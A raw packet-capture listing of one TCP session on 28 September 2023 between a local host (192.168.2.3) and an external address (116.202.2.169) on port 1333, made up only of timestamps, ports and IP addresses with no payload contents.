Sep 28, 2023 06:02:00.454777002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454777956 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454813004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.454823971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454857111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.454967976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455018997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455043077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455091000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455128908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455166101 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455183983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455214024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455251932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455296993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455298901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455344915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455398083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455435991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455449104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455455065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455490112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455490112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455529928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455576897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455600977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455617905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455647945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455678940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455704927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455754995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455807924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455854893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455863953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455895901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455899000 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455943108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.455946922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.455991983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456021070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456073046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456110001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456163883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456172943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456207991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456218958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456255913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456315994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456362009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456373930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456418991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456435919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456454039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456480026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456511021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456521988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456568956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456569910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456615925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456654072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456698895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456715107 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456749916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456763983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456792116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456799984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456845045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456878901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456924915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.456964970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456983089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.456999063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457011938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457043886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457043886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457084894 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457130909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457139015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457185984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457194090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457240105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457252026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457269907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457297087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457328081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457338095 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457384109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457417011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457463026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457474947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457520962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457550049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457597017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457624912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457658052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457670927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457699060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457722902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457756996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457770109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457797050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457808971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457854033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.457892895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.457940102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458065987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458121061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458137035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458168983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458180904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458210945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458218098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458250999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458261967 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458297014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458312988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458359957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458384991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458420038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458446980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458478928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458489895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458534956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458570957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458617926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458638906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458676100 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458692074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458724976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458729029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458762884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458777905 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458807945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458813906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458861113 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458868027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458919048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.458951950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.458990097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459002018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459029913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459083080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459131002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459132910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459178925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459193945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459244013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459279060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459314108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459328890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459357977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459382057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459414959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459428072 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459461927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459480047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459527969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459563971 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459600925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459613085 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459640980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459665060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459711075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459791899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459810019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459844112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459863901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459865093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.459916115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.459952116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460005045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460020065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460037947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460067034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460097075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460124016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460169077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460182905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460216999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460228920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460257053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460280895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460314989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460328102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460357904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460431099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460448980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460479021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460499048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460506916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460555077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460561037 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460609913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460616112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460661888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460685015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460704088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460730076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460757017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460799932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460850954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460885048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460921049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.460933924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460962057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.460987091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461033106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461045027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461091042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461098909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461133003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461144924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461173058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461180925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461225033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461261034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461278915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461314917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461345911 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461357117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461405039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461441994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461492062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461507082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461527109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461559057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461559057 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461591005 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461610079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461646080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461694002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461710930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461731911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461760998 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461781025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461781025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461828947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.461927891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.461978912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462009907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462054968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462071896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462119102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462151051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462199926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462219954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462265015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462301016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462333918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462347031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462378025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462400913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462465048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462502003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462554932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462580919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462634087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462713957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462732077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462780952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462785006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462801933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462836027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462863922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462915897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462918997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462934017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.462964058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.462995052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463021994 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463068008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463077068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463095903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463124037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463155031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463181019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463227987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463239908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463284969 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463298082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463346004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463366985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463385105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463413954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463443995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463454008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463474035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463501930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463521004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463521957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463566065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463603020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463635921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463648081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463676929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463701010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463737965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463752031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463783026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463864088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463881969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463912964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463937044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.463944912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463979006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.463990927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464025021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464076042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464126110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464140892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464184999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464221001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464267015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464303017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464350939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464364052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464411020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464437008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464485884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464507103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464553118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464567900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464586020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.464615107 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464646101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.464657068 CEST	1333	49810	116.202.2.169	192.168.2.3
